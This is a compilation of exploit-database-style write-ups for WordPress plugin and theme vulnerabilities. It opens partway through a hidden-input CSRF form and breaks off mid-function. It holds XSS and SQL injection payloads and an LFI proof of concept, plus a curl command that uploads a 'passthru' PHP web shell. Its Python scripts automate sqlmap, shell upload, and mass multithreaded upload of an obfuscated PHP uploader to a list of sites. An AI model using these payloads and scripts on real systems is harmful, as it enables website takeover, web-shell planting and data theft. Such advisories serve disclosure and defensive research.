<input type="hidden" name="ad15_block_cat" value="" />
<input type="hidden" name="ad15_block_cat_type" value="Black List" />
<input type="hidden" name="ad15_minimum_paragraphs" value="0" />
<input type="hidden" name="ad15_paragraph_text" value="" />
<input type="hidden" name="ad15_paragraphNumber" value="0" />
<input type="hidden" name="ad15_directionType" value="From Top" />
<input type="hidden" name="ad15_excerptNumber" value="0" />
<input type="hidden" name="ad15_enable_manual" value="0" />
<input type="hidden" name="ad15_enable_php_call" value="0" />
<input type="hidden" name="ad16_name" value="Block 16" />
<input type="hidden" name="ad16_process_php" value="0" />
<input type="hidden" name="ad16_data" value="" />
<input type="hidden" name="ad16_displayType" value="None" />
<input type="hidden" name="ad16_display_for_users" value="all" />
<input type="hidden" name="ad16_display_for_devices" value="all" />
<input type="hidden" name="ad16_floatType" value="None" />
<input type="hidden" name="ad16_custom_css" value="" />
<input type="hidden" name="ad16_widget_settings_post" value="0" />
<input type="hidden" name="ad16_widget_settings_post" value="1" />
<input type="hidden" name="ad16_widget_settings_page" value="0" />
<input type="hidden" name="ad16_widget_settings_home" value="0" />
<input type="hidden" name="ad16_widget_settings_home" value="1" />
<input type="hidden" name="ad16_widget_settings_category" value="0" />
<input type="hidden" name="ad16_widget_settings_category" value="1" />
<input type="hidden" name="ad16_widget_settings_search" value="0" />
<input type="hidden" name="ad16_widget_settings_search" value="1" />
<input type="hidden" name="ad16_widget_settings_archive" value="0" />
<input type="hidden" name="ad16_widget_settings_archive" value="1" />
<input type="hidden" name="ad16_after_day" value="0" />
<input type="hidden" name="ad16_general_tag" value="gadgets" />
<input type="hidden" name="ad16_block_user" value="" />
<input type="hidden" name="ad16_domain_list_type" value="Black List" />
<input type="hidden" name="ad16_block_cat" value="" />
<input type="hidden" name="ad16_block_cat_type" value="Black List" />
<input type="hidden" name="ad16_minimum_paragraphs" value="0" />
<input type="hidden" name="ad16_paragraph_text" value="" />
<input type="hidden" name="ad16_paragraphNumber" value="0" />
<input type="hidden" name="ad16_directionType" value="From Top" />
<input type="hidden" name="ad16_excerptNumber" value="0" />
<input type="hidden" name="ad16_enable_manual" value="0" />
<input type="hidden" name="ad16_enable_php_call" value="0" />
<input type="hidden" name="adH_process_php" value="0" />
<input type="hidden" name="adH_data" value="" />
<input type="hidden" name="adH_enable" value="0" />
<input type="hidden" name="adF_process_php" value="0" />
<input type="hidden" name="adF_data" value="" />
<input type="hidden" name="adF_enable" value="0" />
<input type="hidden" name="syntax-highlighter-theme" value="ad_inserter" />
<input type="hidden" name="block-class-name" value="code-block" />
<input type="hidden" name="ai-active-tab" value="1" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Mitigation
==========
Update to Latest version 1.5.3
Change Log
==========
https://wordpress.org/plugins/ad-inserter/changelog/
Disclosure
==========
18-April-2015 Reported to Developer
2-may-2015 Fixed By Developer
credits
=======
* Kaustubh Padwad
* Information Security Researcher
* kingkaustubh (at) me (dot) com
* https://twitter.com/s3curityb3ast
* http://breakthesec.com
* https://www.linkedin.com/in/kaustubhpadwad
1. Introduction
# Exploit Title: Acunetix WP Security 3.0.3 XSS
# Date: May.03.2016
# Exploit Author: Johto Robbie
# Facebook: https://www.facebook.com/johto.robbie
# Vendor: VN Hacker News
# Tested On: Apache 2.4.17 / PHP 5.6.16 / Windows 10 / WordPress 4.5.1
# Category: Webapps
# Software Link:
http://localhost:8888/wordpress/wp-admin/admin.php?page=swpa_live_traffic
2. Descryption:
I have to insert scripts into the content search wordpress. The result is
that it is logging in Acunetix Secure WordPress. Taking advantage of this,
I have exploited XSS vulnerability
<span class="w-entry"><a
href="http://localhost:8888/wordpress/?s="><script>alert("Johto.Robbie"</script>"
target="_blank" title="Opens in a new tab">
http://localhost:8888/wordpress/?s=
"><script>alert("Johto.Robbie"</script></a></span>
Video Demonstration:
https://www.youtube.com/watch?v=L8t3_HGriP8&feature=youtu.be
3. Report Timeline
02-05-2016 : Discovered
02-05-2016 : Vendor notified
4. Solution
Update to version 4.5.1
# Exploit Title : Activity Log Wordpress Plugin Stored Cross Site Scripting (XSS)
# Date: 25-02-2018
# Exploit Author : Stefan Broeder
# Vendor Homepage: https://pojo.me
# Software Link: https://wordpress.org/plugins/aryo-activity-log/
# Version: 2.4.0
# CVE : CVE-2018-8729
# Category : webapps
Description
===========
Activity Log is a WordPress plugin which tracks site activity. It has more than 70.000 active installations. Version 2.4.0 (and possibly the previous ones) are affected by several Stored XSS vulnerabilities.
Vulnerable part of code
=======================
Storing the payload:
File: aryo-activity-log/hooks/class-aal-hook-attachment.php:14. The log entry that is stored contains the result of get_the_title($post->ID), which can include HTML and is not sanitized by WordPress.
File: aryo-activity-log/hooks/class-aal-hook-comments.php:14. The log entry that is stored contains the result of get_the_title($comment->comment_post_ID), which can include HTML and is not sanitized by WordPress.
File: aryo-activity-log/hooks/class-aal-hook-posts.php:7. The log entry that is stored contains the result of $title = get_the_title($post), which can include HTML and is not sanitized by WordPress.
Displaying the payload:
File: aryo-activity-log/classes/class-aal-activity-log-list-table.php:209. $item->object_name is displayed without sanitization and can contain HTML tags.
Impact
======
Arbitrary JavaScript code can be run on browser side if a user is able to create a post or upload an attachment.
Exploitation
============
To successfully exploit this vulnerability, an attacker would have to perform any of the following:
- Create/edit/draft/publish/trash/untrash a post with JavaScript in the title
- Create/edit/trash/untrash/mark_as_spam/unmark_as_spam a comment on a post with JavaScript in the title
- Add/edit/delete an attachment with JavaScript in the attachment title
Regular website visitors will not have the capability to do any of these, however, possible threat actors might include:
- A user with the role of ‘editor’ within WordPress (non-admins which are able to create content)
- A rogue administrator among multiple administrators
- A compromised plugin
If the payload has been injected, then it will be executed once the Activity Log is viewed. This can possibly lead to stealing of CSRF nonces and creation of new (administrator) users on the WordPress instance.
Solution
========
Update to 2.4.1
# Exploit Title : Activity Log Wordpress Plugin Stored Cross Site Scripting (XSS)
# Date: 25-02-2018
# Exploit Author : Stefan Broeder
# Contact : https://twitter.com/stefanbroeder
# Vendor Homepage: https://pojo.me
# Software Link: https://wordpress.org/plugins/aryo-activity-log/
# Version: 2.4.0
# CVE : CVE-2018-8729
# Category : webapps
Description
===========
Activity Log is a WordPress plugin which tracks site activity. It has more than 70.000 active installations. Version 2.4.0 (and possibly the previous ones) are affected by several Stored XSS vulnerabilities.
Vulnerable part of code
=======================
Storing the payload:
File: aryo-activity-log/hooks/class-aal-hook-attachment.php:14. The log entry that is stored contains the result of get_the_title($post->ID), which can include HTML and is not sanitized by WordPress.
File: aryo-activity-log/hooks/class-aal-hook-comments.php:14. The log entry that is stored contains the result of get_the_title($comment->comment_post_ID), which can include HTML and is not sanitized by WordPress.
File: aryo-activity-log/hooks/class-aal-hook-posts.php:7. The log entry that is stored contains the result of $title = get_the_title($post), which can include HTML and is not sanitized by WordPress.
Displaying the payload:
File: aryo-activity-log/classes/class-aal-activity-log-list-table.php:209. $item->object_name is displayed without sanitization and can contain HTML tags.
Impact
======
Arbitrary JavaScript code can be run on browser side if a user is able to create a post or upload an attachment.
Exploitation
============
To successfully exploit this vulnerability, an attacker would have to perform any of the following:
- Create/edit/draft/publish/trash/untrash a post with JavaScript in the title
- Create/edit/trash/untrash/mark_as_spam/unmark_as_spam a comment on a post with JavaScript in the title
- Add/edit/delete an attachment with JavaScript in the attachment title
Regular website visitors will not have the capability to do any of these, however, possible threat actors might include:
- A user with the role of ‘editor’ within WordPress (non-admins which are able to create content)
- A rogue administrator among multiple administrators
- A compromised plugin
If the payload has been injected, then it will be executed once the Activity Log is viewed. This can possibly lead to stealing of CSRF nonces and creation of new (administrator) users on the WordPress instance.
Solution
========
Update to 2.4.1
Persistent Cross-Site Scripting in WordPress Activity Log plugin
Han Sahin
Abstract
A stored Cross-Site Scripting (XSS) vulnerability has been found in the WordPress Activity Log plugin. By using this vulnerability an attacker can inject malicious JavaScript code into the application, which will execute within the browser of any user who views the Activity Log, in general WP admin.
Tested versions
This issue was successfully tested on WordPress Activity Log plugin version 2.3.1.
Fix
This issue has been fixed in version 2.3.2 of the WordPress Activity Log plugin. The updated plugin can be downloaded from the following location: https://downloads.wordpress.org/plugin/aryo-activity-log.2.3.2.zip.
Introduction
The WordPress Activity Log plugin allows monitoring and tracking of site activity on a WordPress site. A stored Cross-Site Scripting vulnerability has been discovered in the WordPress Activity Log plugin which allows an unauthenticated attacker to inject malicious JavaScript code into the application, which will execute within the browser of any user who views the Activity Log (WP admin).
Details
The WordPress Activity Log plugin fails to sufficiently check input supplied to the X-Forwarded-For HTTP header and perform output encoding when the input is presented in a "wrong password event". As a result the malicious request will be stored in the Activity Log page, executing the payload when an unsuspecting user views this specific page.
An attacker can use this vulnerability to perform a wide variety of actions, such as stealing victims' session tokens or login credentials, performing arbitrary actions on their behalf, and logging their keystrokes or deliver malware.
Persistent Cross-Site scripting flaws are typically more serious than reflected vulnerabilities because they do not require a separate delivery mechanism in order to reach target users (victims).
Proof of concept
This vulnerability can be demonstrated by submitting an XFF header similar to the following:
POST /wp-login.php HTTP/1.1
Host: 192.168.28.135
Content-Length: 113
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Referer: http://
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8,nl;q=0.6
X-Forwarded-For: <script>alert(document.cookie);</script>
Connection: close
log=wordpress&pwd=sdsdssdsdsd&wp-submit=Log+In&redirect_to=http%3A%2F%2F192.168.28.135%2Fwp-admin%2F&testcookie=1
+---------------------------------------------------------------------------+
#[+] Author: TUNISIAN CYBER
#[+] Title: WP Plugin Free ACF Frontend Display File Upload Vulnerability
#[+] Date: 3-07-2015
#[+] Type: WebAPP
#[+] Download Plugin: https://downloads.wordpress.org/plugin/acf-frontend-display.2.0.5.zip
#[+] Tested on: KaliLinux
#[+] Friendly Sites: sec4ever.com
#[+] Twitter: @TCYB3R
+---------------------------------------------------------------------------+
curl -k -X POST -F "action=upload" -F "files=@/root/Desktop/evil.php" "site:wp-content/plugins/acf-frontend-display/js/blueimp-jQuery-File-Upload-d45deb1/server/php/index.php"
File Path: site/wp-content/uploads/uigen_YEAR/file.php
Example: site/wp-content/uploads/uigen_2015/evil.php
evil.php: <?php passthru($_GET['cmd']); ?>
TUNISIAN CYBER(miutex)-S4E
# Exploit Title: WordPress Plugin AccessPress Social Icons 1.8.2 - 'icon title' Stored Cross-Site Scripting (XSS)
# Date: 11/12/2021
# Exploit Author: Murat DEMIRCI (@butterflyhunt3r)
# Vendor Homepage: https://accesspressthemes.com/
# Software Link: https://wordpress.org/plugins/accesspress-social-icons/
# Version: 1.8.2
# Tested on : Windows 10
#Poc:
1. Install Latest WordPress
2. Install and activate AccessPress Social Icons 1.8.2
3. Open plugin on the left frame and keep going "add new" field. Click "Choose icon indiviually" and fill other fields.
4. Enter JavaScript payload which is mentioned below into 'icon title' field and "Add Icon to list".
<img src=x onerror=confirm('xss')>
4. You will observe that the payload successfully got stored into the database and alert will be seen on the screen.
# Exploit Title: Wordpress Plugin Abtest - Local File Inclusion
# Date: 2016-03-19
# Google Dork : inurl:/wp-content/plugins/abtest/
# Exploit Author: CrashBandicot
# Vendor Homepage: https://github.com/wp-plugins/abtest
# Tested on: Chrome
# Vulnerable File : abtest_admin.php
<?php
require 'admin/functions.php';
if (isset($_GET['action'])) {
include 'admin/' . $_GET['action'] . '.php';
} else {
include 'admin/list_experiments.php';
}
?>
# PoC : localhost/wp-content/plugins/abtest/abtest_admin.php?action=[LFI]
# Pics : http://i.imgur.com/jZFKYOc.png
source: https://www.securityfocus.com/bid/55689/info
The ABC Test plugin for WordPress is prone to a cross-site-scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
ABC Test 0.1 is vulnerable; other versions may also be affected.
http://www.example.com/blog/wp-admin/admin.php?page=abctest&do=edit&id=%22%3E%3Ch1 %3EXSS%3C/h1
# Exploit Title: WordPress Plugin AAWP 3.16 - 'tab' Reflected Cross Site Scripting (XSS) (Authenticated)
# Date: 04/01/2022
# Exploit Author: Andrea Bocchetti
# Vendor Homepage: https://getaawp.com/
# Software Link: https://getaawp.com/
# Version: 3.16
# Tested on: Windows 10 - Chrome, WordPress 5.8.2
# Proof of Concept:
# 1- Install and activate AAWP 3.16 plugin.
# 2- Go to https://localhost.com/wp-admin/admin.php?page=aawp-settings&tab=XXXX
# 3- Add payload to the Tab, the XSS Payload: %22onclick%3Dprompt%288%29%3E%3Csvg%2Fonload%3Dprompt%288%29%3E%22%40x.y
# 4- XSS has been triggered.
# Go to this url "http://localhost/wp-admin/admin.php?page=aawp-settings&tab=%22onclick%3Dprompt%288%29%3E%3Csvg%2Fonload%3Dprompt%288%29%3E%22%40x.y"
XSS will trigger.
Source: https://sumofpwn.nl/advisory/2016/stored_cross_site_scripting_vulnerability_in_404_to_301_wordpress_plugin.html
Stored Cross-Site Scripting vulnerability in 404 to 301 WordPress Plugin
Abstract
A stored Cross-Site Scripting vulnerability was found in the 404 to 301 WordPress Plugin. This issue can be exploited by an anonymous user and allows an attacker to perform a wide variety of actions, such as stealing users' session tokens, or performing arbitrary actions on their behalf.
Contact
For feedback or questions about this advisory mail us at sumofpwn at securify.nl
The Summer of Pwnage
This issue has been found during the Summer of Pwnage hacker event, running from July 1-29. A community summer event in which a large group of security bughunters (worldwide) collaborate in a month of security research on Open Source Software (WordPress this time). For fun. The event is hosted by Securify in Amsterdam.
OVE ID
OVE-20160719-0003
Tested versions
This issue was successfully tested on 404 to 301 WordPress Plugin version 2.2.8.
Fix
This issue is resolved in 404 to 301 WordPress Plugin version 2.3.1.
Introduction
The 404 to 301 WordPress Plugin automatically redirects, logs and notifies all 404 page errors to any page using 301 redirect for SEO. A Stored Cross-Site Scripting vulnerability exists in the 404-to-301 WordPress plugin.
Details
The vulnerability exists in the file admin/class-404-to-301-logs.php, which fails to correctly escape user-controlled strings which are output in HTML tables containing logs shown to site administrators, such as the Referer (ref) and User-Agent (ua) fields.
In order to exploit this issue, after an attack attempt has been made, an administrator must view the logs (via the WordPress administration console) provided by the plugin, by clicking '404 Error Logs'.
Proof of concept
Submit an HTTP request to a non-existent URL (to trigger the 404 handler) containing a header such as one of the following:
Referer: "<iframe src=/></iframe>
User-Agent: "<script>alert(/hi/);</script>
# Exploit Title: Wordpress Plugin 404 to 301 2.0.2 - SQL-Injection (Authenticated)
# Date 30.01.2022
# Exploit Author: Ron Jost (Hacker5preme)
# Vendor Homepage: https://de.wordpress.org/plugins/404-to-301/
# Software Link: https://downloads.wordpress.org/plugin/404-to-301.2.0.2.zip
# Version: <= 2.0.2
# Tested on: Ubuntu 20.04
# CVE: CVE-2015-9323
# CWE: CWE-89
# Documentation: https://github.com/Hacker5preme/Exploits/blob/main/Wordpress/CVE-2015-9323/README.md
'''
Description:
The 404-to-301 plugin before 2.0.3 for WordPress has SQL injection.
'''
banner = '''
.o88b. db db d88888b .d888b. .d88b. db ooooo .d888b. d8888b. .d888b. d8888b.
d8P Y8 88 88 88' VP `8D .8P 88. o88 8P~~~~ 88' `8D VP `8D VP `8D VP `8D
8P Y8 8P 88ooooo odD' 88 d'88 88 dP `V8o88' oooY' odD' oooY'
8b `8b d8' 88~~~~~ C8888D .88' 88 d' 88 88 V8888b. C8888D d8' ~~~b. .88' ~~~b.
Y8b d8 `8bd8' 88. j88. `88 d8' 88 `8D d8' db 8D j88. db 8D
`Y88P' YP Y88888P 888888D `Y88P' VP 88oobY' d8' Y8888P' 888888D Y8888P'
[+] 404 to 301 - SQL-Injection
[@] Developed by Ron Jost (Hacker5preme)
'''
print(banner)
import argparse
import os
import requests
from datetime import datetime
import json
# User-Input:
my_parser = argparse.ArgumentParser(description='Wordpress Plugin 404 to 301 - SQL Injection')
my_parser.add_argument('-T', '--IP', type=str)
my_parser.add_argument('-P', '--PORT', type=str)
my_parser.add_argument('-U', '--PATH', type=str)
my_parser.add_argument('-u', '--USERNAME', type=str)
my_parser.add_argument('-p', '--PASSWORD', type=str)
args = my_parser.parse_args()
target_ip = args.IP
target_port = args.PORT
wp_path = args.PATH
username = args.USERNAME
password = args.PASSWORD
print('[*] Starting Exploit at: ' + str(datetime.now().strftime('%H:%M:%S')))
# Authentication:
session = requests.Session()
auth_url = 'http://' + target_ip + ':' + target_port + wp_path + 'wp-login.php'
check = session.get(auth_url)
# Header:
header = {
'Host': target_ip,
'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
'Accept-Language': 'de,en-US;q=0.7,en;q=0.3',
'Accept-Encoding': 'gzip, deflate',
'Content-Type': 'application/x-www-form-urlencoded',
'Origin': 'http://' + target_ip,
'Connection': 'close',
'Upgrade-Insecure-Requests': '1'
}
# Body:
body = {
'log': username,
'pwd': password,
'wp-submit': 'Log In',
'testcookie': '1'
}
auth = session.post(auth_url, headers=header, data=body)
# SQL-Injection (Exploit):
# Generate payload for sqlmap
print ('[+] Payload for sqlmap exploitation:')
cookies_session = session.cookies.get_dict()
cookie = json.dumps(cookies_session)
cookie = cookie.replace('"}','')
cookie = cookie.replace('{"', '')
cookie = cookie.replace('"', '')
cookie = cookie.replace(" ", '')
cookie = cookie.replace(":", '=')
cookie = cookie.replace(',', '; ')
exploit_url = r'sqlmap -u "http://' + target_ip + ':' + target_port + wp_path + r'wp-admin/admin.php?page=i4t3-logs&orderby=1"'
exploit_risk = ' --level 2 --risk 2'
exploit_cookie = r' --cookie="' + cookie + r'" '
print(' Sqlmap options:')
print(' -a, --all Retrieve everything')
print(' -b, --banner Retrieve DBMS banner')
print(' --current-user Retrieve DBMS current user')
print(' --current-db Retrieve DBMS current database')
print(' --passwords Enumerate DBMS users password hashes')
print(' --tables Enumerate DBMS database tables')
print(' --columns Enumerate DBMS database table column')
print(' --schema Enumerate DBMS schema')
print(' --dump Dump DBMS database table entries')
print(' --dump-all Dump all DBMS databases tables entries')
retrieve_mode = input('Which sqlmap option should be used to retrieve your information? ')
exploit_code = exploit_url + exploit_risk + exploit_cookie + retrieve_mode + ' -p orderby -v0'
os.system(exploit_code)
print('Exploit finished at: ' + str(datetime.now().strftime('%H:%M:%S')))
# Exploit Title: Unauthenticated SQL injeciton in 404 plugin for Wordpress v1.0
# Google Dork: N/A
# Date: 17/12/2016
# Exploit Author: Ahmed Sherif (Deloitte)
# Vendor Homepage: N/A
# Software Link: https://wordpress.org/plugins/404-redirection-manager/
# Version: V1.0
# Tested on: Linux Mint
# CVE : N/A
The plugin does not properly sanitize the user input. Hence, it was
vulnerable to SQL injection.
The vulnerable page is : custom/lib/cf.SR_redirect_manager.class.php on line 356
[#] Proof of Concept (PoC):
GET /path-to-wordpress/%27%29%20AND%20%28SELECT%20%2a%20FROM%20%28SELECT%28SLEEP%285-%28IF%28%27a%27%3D%27a%27%2C0%2C5%29%29%29%29%29FPYG%29%20AND%20%28%27SQL%27%3D%27SQL
HTTP/1.1
Host: localhost
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: wp-settings-time-1=1480877693
Connection: close*
# Exploit Title: Wordpress Plugin 3DPrint Lite 1.9.1.4 - Arbitrary File Upload
# Google Dork: inurl:/wp-content/plugins/3dprint-lite/
# Date: 22/09/2021
# Exploit Author: spacehen
# Vendor Homepage: https://wordpress.org/plugins/3dprint-lite/
# Version: <= 1.9.1.4
# Tested on: Ubuntu 20.04.1
import os.path
from os import path
import json
import requests;
import sys
def print_banner():
print("3DPrint Lite <= 1.9.1.4 - Arbitrary File Upload")
print("Author -> spacehen (www.github.com/spacehen)")
def print_usage():
print("Usage: python3 exploit.py [target url] [php file]")
print("Ex: python3 exploit.py https://example.com ./shell.php")
def vuln_check(uri):
response = requests.get(uri)
raw = response.text
if ("jsonrpc" in raw):
return True;
else:
return False;
def main():
print_banner()
if(len(sys.argv) != 3):
print_usage();
sys.exit(1);
base = sys.argv[1]
file_path = sys.argv[2]
ajax_action = 'p3dlite_handle_upload'
admin = '/wp-admin/admin-ajax.php';
uri = base + admin + '?action=' + ajax_action ;
check = vuln_check(uri);
if(check == False):
print("(*) Target not vulnerable!");
sys.exit(1)
if( path.isfile(file_path) == False):
print("(*) Invalid file!")
sys.exit(1)
files = {'file' : open(file_path)}
print("Uploading Shell...");
response = requests.post(uri, files=files)
file_name = path.basename(file_path)
if(file_name in response.text):
print("Shell Uploaded!")
if(base[-1] != '/'):
base += '/'
print(base + "wp-content/uploads/p3d/" + file_name);
else:
print("Shell Upload Failed")
sys.exit(1)
main();
# Exploit Title: Wordpress Plugin 3dady real-time web stats 1.0 - Stored Cross Site Scripting (XSS)
# Google Dork: inurl:/wp-content/plugins/3dady-real-time-web-stats/
# Date: 2022-08-24
# Exploit Author: UnD3sc0n0c1d0
# Vendor Homepage: https://profiles.wordpress.org/3dady/
# Software Link: https://downloads.wordpress.org/plugin/3dady-real-time-web-stats.zip
# Category: Web Application
# Version: 1.0
# Tested on: Debian / WordPress 6.0.1
# CVE : N/A
# 1. Technical Description:
The 3dady real-time web stats WordPress plugin is vulnerable to stored XSS. Specifically in the dady_input_text
and dady2_input_text fields because the user's input is not properly sanitized which allows the insertion of
JavaScript code that can exploit the vulnerability.
# 2. Proof of Concept (PoC):
a. Install and activate version 1.0 of the plugin.
b. Go to the plugin options panel (http://[TARGET]/wp-admin/admin.php?page=3dady).
c. Insert the following payload in any of the visible fields (dady_input_text or dady2_input_text):
" autofocus onfocus=alert(/XSS/)>
d. Save the changes and immediately the popup window demonstrating the vulnerability (PoC) will be executed.
Note: This change will be permanent until you modify the edited fields.
source: https://www.securityfocus.com/bid/53521/info
The 2 Click Social Media Buttons plugin for WordPress is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
2 Click Social Media Buttons 0.32.2 is vulnerable; other versions may also be affected.
http://www.example.com/wp-content/plugins/2-click-socialmedia-buttons/libs/pinterest.php?pinterest-url=%22%3E%3Cscript%3Ealert%281%29%3C/script%3E&pinterest-description=1
http://www.example.com/wp-content/plugins/2-click-socialmedia-buttons/libs/xing.php?xing-url=%22%3E%3C/script%3E%3Cscript%3Ealert%281%29%3C/script%3E
source: https://www.securityfocus.com/bid/50860/info
1-jquery-photo-gallery-slideshow-flash plug-in for WordPress is prone to a cross-site-scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
1-jquery-photo-gallery-slideshow-flash 1.01 is vulnerable; other versions may also be affected.
UPDATE April 18, 2012: Further reports indicate this issue may not be a vulnerability; the issue can not be exploited as described.
http://www.example.com/[path]/wp-content/plugins/1-jquery-photo-gallery-slideshow-flash/wp-1pluginjquery.php?page=[xss]
source: https://www.securityfocus.com/bid/46783/info
1 Flash Gallery is prone to an SQL-injection vulnerability and a cross-site scripting vulnerability.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
1 Flash Gallery 0.2.5 is vulnerable; other versions may also be affected.
http://www.example.com/wp-content/plugins/1-flash-gallery/folder.php?type=%22%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
<form action="http://[host]/wp-content/plugins/1-flash-gallery/massedit_album.php" method="post" name="main" >
<input type="hidden" name="album_id" value="1" />
<input type="hidden" name="images" value="1" />
<input type="hidden" name="gall_id" value="SQL_CODE_HERE" />
<input type="submit" value="submit" name="submit" />
# Exploit Title: Wordpress Plugin - Membership For WooCommerce < v2.1.7 - Arbitrary File Upload to Shell (Unauthenticated)
# Date: 2024-02-25
# Author: Milad Karimi (Ex3ptionaL)
# Category : webapps
# Tested on: windows 10 , firefox
import sys , requests, re , json
from multiprocessing.dummy import Pool
from colorama import Fore
from colorama import init
init(autoreset=True)
headers = {'Connection': 'keep-alive', 'Cache-Control': 'max-age=0',
'Upgrade-Insecure-Requests': '1', 'User-Agent': 'Mozlila/5.0 (Linux;
Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like
Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'Accept':
'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',
'Accept-Encoding': 'gzip, deflate', 'Accept-Language':
'en-US,en;q=0.9,fr;q=0.8', 'referer': 'www.google.com'}
uploader = """
GIF89a
<?php ?>
<!DOCTYPE html>
<html>
<head>
<title>Resultz</title>
</head>
<body><h1>Uploader</h1>
<form enctype='multipart/form-data' action='' method='POST'>
<p>Uploaded</p>
<input type='file' name='uploaded_file'></input><br />
<input type='submit' value='Upload'></input>
</form>
</body>
</html>
<?PHP
if(!empty($_FILES[base64_decode('dXBsb2FkZWRfZmlsZQ==')])){$fdudxfib_d6fe1d0be6347b8ef2427fa629c04485=base64_decode('Li8=');$fdudxfib_d6fe1d0be6347b8ef2427fa629c04485=$fdudxfib_d6fe1d0be6347b8ef2427fa629c04485.basename($_FILES[base64_decode('dXBsb2FkZWRfZmlsZQ==')][base64_decode('bmFtZQ==')]);if(move_uploaded_file($_FILES[base64_decode('dXBsb2FkZWRfZmlsZQ==')][base64_decode('dG1wX25hbWU=')],$fdudxfib_d6fe1d0be6347b8ef2427fa629c04485)){echo
base64_decode('VGhlIGZpbGUg').basename($_FILES[base64_decode('dXBsb2FkZWRfZmlsZQ==')][base64_decode('bmFtZQ==')]).base64_decode('IGhhcyBiZWVuIHVwbG9hZGVk');}else{echo
base64_decode('VGhlcmUgd2FzIGFuIGVycm9yIHVwbG9hZGluZyB0aGUgZmlsZSwgcGxlYXNlIHRyeSBhZ2FpbiE=');}}?>
"""
requests.urllib3.disable_warnings()
def Exploit(Domain):
try:
if 'http' in Domain:
Domain = Domain
else:
Domain = 'http://'+Domain
myup = {'': ('db.php', uploader)}
req = requests.post(Domain +
'/wp-admin/admin-ajax.php?action=wps_membership_csv_file_upload',
files=myup, headers=headers,verify=False, timeout=10).text
req1 = requests.get(Domain +
'/wp-content/uploads/mfw-activity-logger/csv-uploads/db.php')
if 'Ex3ptionaL' in req1:
print (fg+'[+] '+ Domain + ' --> Shell Uploaded')
open('Shellz.txt', 'a').write(Domain +
'/wp-content/uploads/mfw-activity-logger/csv-uploads/db.php' + '\n')
else:
print (fr+'[+] '+ Domain + '{}{} --> Not Vulnerability')
except:
print(fr+' -| ' + Domain + ' --> {} [Failed]')
target = open(input(fm+"Site List: "), "r").read().splitlines()
mp = Pool(int(input(fm+"Threads: ")))
mp.map(Exploit, target)
mp.close()
mp.join()
Exploit Title: WordPress File Upload < 4.23.3 Stored XSS (CVE 2023-4811)
Date: 18 December 2023
Exploit Author: Faiyaz Ahmad
Vendor Homepage: https://wordpress.com/
Version: 4.23.3
CVE : CVE 2023-4811
Proof Of Concept:
1. Login to the wordpress account
2. Add the following shortcode to a post in "File Upload Plugin":
[wordpress_file_upload redirect="true" redirectlink="*javascript:alert(1)*"]
3. Upload any file on the resulting post.
4. After the upload completes, you will see the XSS alert in the browser.
# Exploit Title: Wordpress Epsilon Framework Multiple Themes - Unauthenticated Function Injection
# Date: 22/12/2020
# Exploit Authors: gx1 <g.per45[at]gmail.com> lotar <Giuseppe.DiTerlizzi[at]nttdata.com>
# Vendor Homepage: https://wordpress.com/
# Software Link: https://github.com/WordPress/WordPress
# Affected Themes:
shapely - Fixed in version 1.2.9
newsmag - Fixed in version 2.4.2
activello - Fixed in version 1.4.2
illdy - Fixed in version 2.1.7
allegiant - Fixed in version 1.2.6
newspaper-x - Fixed in version 1.3.2
pixova-lite - Fixed in version 2.0.7
brilliance - Fixed in version 1.3.0
medzone-lite - Fixed in version 1.2.6
regina-lite - Fixed in version 2.0.6
transcend - Fixed in version 1.2.0
affluent - Fixed in version 1.1.2
bonkers - Fixed in version 1.0.6
antreas - Fixed in version 1.0.7
naturemag-lite - No known fix
# Tested on: Wordpress 5.6
# CVE : N/A
# References:
- https://wpscan.com/vulnerability/10417
- https://blog.nintechnet.com/unauthenticated-function-injection-vulnerability-fixed-in-15-wordpress-themes/
- https://www.wordfence.com/blog/2020/11/large-scale-attacks-target-epsilon-framework-themes/
- https://developer.wordpress.org/reference/classes/requests/request_multiple/
Description:
Fifteen WordPress themes use a vulnerable version of epsilon-framework that vulnerable to a critical unauthenticated function injection vulnerability, due to the lack of capability and CSRF nonce checks in AJAX actions.
Technical Details:
The vulnerability is present in epsilon_framework_ajax_action AJAX action that is accessible to all users, authenticated or not.
The function takes three POST user input, assign them to the $class, $method and $args variables and calls the class with arguments:
================================================================
public function epsilon_framework_ajax_action() {
if ( 'epsilon_framework_ajax_action' !== $_POST['action'] ) {
wp_die(
json_encode(
array(
'status' => false,
'error' => 'Not allowed',
)
)
);
}
if ( count( $_POST['args']['action'] ) !== 2 ) {
wp_die(
json_encode(
array(
'status' => false,
'error' => 'Not allowed',
)
)
);
}
if ( ! class_exists( $_POST['args']['action'][0] ) ) {
wp_die(
json_encode(
array(
'status' => false,
'error' => 'Class does not exist',
)
)
);
}
$class = $_POST['args']['action'][0];
$method = $_POST['args']['action'][1];
